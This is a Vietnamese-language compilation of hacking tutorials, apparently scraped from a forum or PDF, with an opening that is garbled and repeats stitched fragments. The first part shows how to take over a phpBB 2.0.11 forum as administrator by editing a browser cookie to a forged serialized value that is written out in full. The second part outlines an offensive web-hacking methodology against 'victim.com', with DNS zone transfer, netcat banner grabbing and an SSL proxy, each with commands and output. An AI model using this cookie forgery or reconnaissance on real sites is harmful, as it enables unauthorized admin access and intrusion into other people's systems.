Phương pháp chung : -Tìm hiểu sơ lược về các thành phần site cần hack: Cái này bạn sẽ đi thu lượm các thông tin về cấu trúc ,thành phần của site như phương pháp chuyển giao dữ liệu,thông
Trang 1- Mở trang mà mình đang dùng là thằng này và delete hết các cookie của nó đi trừ dòng có chữ mysql_data
Trích:
www.tqcvn.com
Trang 3dondoc (vniss)
Hướng dẫn hack forum phpBB 2.0.11 (bài 3)
- Chọn cookie đó và Edit nó Trong field Value xoá hết cookie cũ đi và paste cái dòng ở trên vào rồi OK > Close thoát ra ngoài :
Trích:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%
3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
Reload lại và ta được gì nào > nghiễm nhiên trở thành Admin Ở đây là lavekings
Trang 5Giờ bạn có thể vào Admin Control Panel và làm gì tuỳ ý Nhưng đừng drop cái
gì là ok
Trang 6dondoc (vniss)
Căn bản để Hack Web
Bài của unixzdo ( mod dịch thuật của HCE cũ )
Hiện nay hack web rất chi là fổ biến.Xin giới thiệu sơ qua về vấn đề hack web
Phương pháp chung :
-Tìm hiểu sơ lược về các thành phần site cần hack:
Cái này bạn sẽ đi thu lượm các thông tin về cấu trúc ,thành phần của site như phương pháp chuyển giao dữ liệu,thông qua những cổng nào,có bao nhiêu
server,nền ứng dụng,
-Tấn công web server: đã có nhiều lỗ hổng trên các server cùng với kịch bản khai
Trang 7thác được công bố một cách công khai trên nhiều trang.Bạn có thể kiểm tra,nếu admin server đó mà chưa fix lỗi thì đó là một cơ hội tốt để khai thác
-Xem xét các ứng dụng em loại nào đang chạy trên server như
asp,php,cgi,,java, cấu trúc thư mục,các cơ sở dữ liệu
-Tấn công vào cơ chế xác thực :mạo danh cookie,đoán password,
-Tấn công hệ thống cấp phép: khi đã có được quyền user thì đây là bước cần
thiết.Có một số biện pháp thông dụng như leo thang đặc quyền,làm thay đổi các giá trị cookie -> thay quyền user,tấn công vào sql server
-Phân tích các chức năng các ứng dụng web:thường thấy với tấn công bằng phê chuẩn đầu vào
-Khai thác việc kết nối cơ sở dữ liệu: thông thường các nhà phát triển ứng dụng web thường chọn tính đơn giản hơn là an toàn,điều này dẫn đến việc xuất dữ liệu nhạy cảm từ sql server xuống trình duyệt của client.Điển hình sql injection
-Attack the client: như cross-site scripting
-Tấn công từ chối dịch vụ : một lổ hổng lớn và đáng sợ
Chúng ta sẽ bắt đầu từ phần 1 , cũng có thể nói là kĩ thuật in dấu chân mạng.Đầu tiên hãy bắt đầu tìm hiểu về nền và loại ứng dụng mà server đang chạy.Web
application chạy ở trên server và trả lại kết quả xuống client qua trình duyệt web
Với các công cụ whois các bạn có thể tìm ra các địa chỉ ip được gán,các dữ liệu liên quan tới dns cùng các thông tin về admin và liên lạc.Hiện có nhiều công cụ whois,song các bạn có thể tham khảo tại http://www.arin.net/whois
Truy vấn cơ sở dữ liệu bởi whois có thể định danh dns server của một tổ chức.Nếu được thiết lập không đúng nó có thể cho phép người dùng nặc danh lấy thông tin như ip mapping với domain name.Để ngăn cản điều này có thể ngăn cản việc backup dns server nơi chứa các file cấu hình vùng.Nếu chức năng này không được
Trang 8thiết lập thì thông tin có thể bị đổ bởi việc thực hiện chuyển vùng
Thực hiện chuyển vùng đơn giản chỉ sử dụng nslookup ,một tiện ích thường cài sẵn trong mọi nền hệ điều hành.Ví dụ trên windows:
C:\Zone transfer\nslookup
Default Server: internal
Address: 10.1.1.65
> server ns1.victim.com
Default Server: ns1.victim.com
Address: 192.168.15.77
> ls -d victim.com
@ IN SOA victim.com root.freebsd.victim.com (
961230 ; Serial
3600 ; Refresh
300 ; Retry
3600000 ; Expire
3600 ) ; Minimum
IN NS freebsd.victim.com
mail.victim.com IN MX 10.0.0.10 ; mail
Trang 9www.victim.com IN A 10.0.0.2 ; web
app.victim.com IN A 10.0.0.1 ; web app 1
vvvvvvvvvv
từ ví dụ này có thể thấy rằng ta có thể truy cập qua dns vào các application server
Tiếp đó hãy sử dụng các công cụ quét cổng khám phá các cổng mở trên server.Mỗi cổng chính là địa chỉ của một ứng dụng nhất định hay nói cách khác là địa chỉ của chúng trên server.Các bạn tham khảo về giao thức sử dụng,địa chỉ và tên ứng dụng đang chạy trên server trong diễn đàn.Có thể hình dung công cụ quét cổng sẽ kết nối tới một cổng xác định của giao thức tcp hay udp và xác định tên ứng dụng theo kịch bản.Tuy vậy cũng có một số kĩ thuật quét cổng cùng công cụ đi kèm như tcp syn scan,tcp scan,các kĩ thuật quét udp,quét với nmap song tôi sẽ không đề cập ở đây vì bài này chỉ mang tính chất giới thiệu
Sau khi thiết lập danh sách các dịch vụ bạn cần xác định platform của server.Kĩ thuật chộp banner với netcat có thể được thực hiện như ví dụ:
C:\nc -nvv 192.168.234.34 80 { chỉ mang tính chất ví dụ}
(UNKOWN) [192.168.234.34] 80 open ?
HEAD /HTTP 1.1
Windows platform/iis server
có thể thấy ở trên là server sử dụng iis trên nền windows
Một số công cụ như netcat,fscan, không thể kết nối tới SSL service để chộp
banner,một trong những cách đơn giản nhất là sử dụng một local proxy.Có vài tool khá tốt cho công việc này,nhưng tôi thấy hay hơn là dùng sslproxy
C:\>sslproxy -1 5000 -R www.victim.com -r 443
Trang 10-c dummycert.pem -p ssl23
SSL: No verify locations, trying default
proxy ready, listening for connections
sslproxy lắng nghe cục bộ trên cổng 5000 và proxy kết nối tới remote server trên cổng 443.Giờ đây có thể mở một cmd shell kết nối tới local host trên port 5000 sử dụng netcat và chộp thông tin banner như sau:
C:\nc>nc -vv localhost 5000
localhost [127.0.0.1] 5000 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 15 Feb 2002 16:47:56 GMT
Server: WebSTAR/4.2 (Unix) mod_ssl/2.8.6 OpenSSL/0.9.6c
Connection: close
Content-Type: text/html
Hãy chuyển sang cửa sổ của sslproxy và chúng ta sẽ thấy kết nối đã được mở ( over ssl ,port 443) ,netcat session đã có được một kết nối tới nó:
connection on fd=412
SSL: Cert error: unknown error 20 in /C=ZA/ST=Western
Cape/L=Cape Town/O=Thawte Consulting
Trang 11cc/OU=Certification Services Division/CN=Thawte Server
CA/Email=server-certs@thawte.com
SSL: negotiated cipher: EDH-RSA-DES-CBC3-SHA
client: broken pipe (read)
Các bạn cũng có thể thử với stunnel và openssl ,nó cũng tương tự như trên
Đây là link down http://www.stunnel.org/download/stunnel/win32/
Chú ý khi chạy nếu chương trình đòi các file dll thì các bạn có thể tìm tại
http://www.stunnel.org/download/stun puter/stunnel/
Tiếp tục đi chi tiết
@-Giờ đây chúng ta chuyển qua bàn về vấn đề hack web server.Việc tấn công này theo tôi biết có thể gồm:Sử dụng các lổ hổng cốt yếu đã biết của các ứng dụng cũng như platform,thứ hai là sử dụng các công cụ quét lỗ hổng tự động đã được tạo ( nhiều công cụ sẽ làm gần như hết cho bạn ,và bạn có thể bổ sung danh sách code vào list code của nó),thứ ba là tấn công từ chối dịch vụ webserver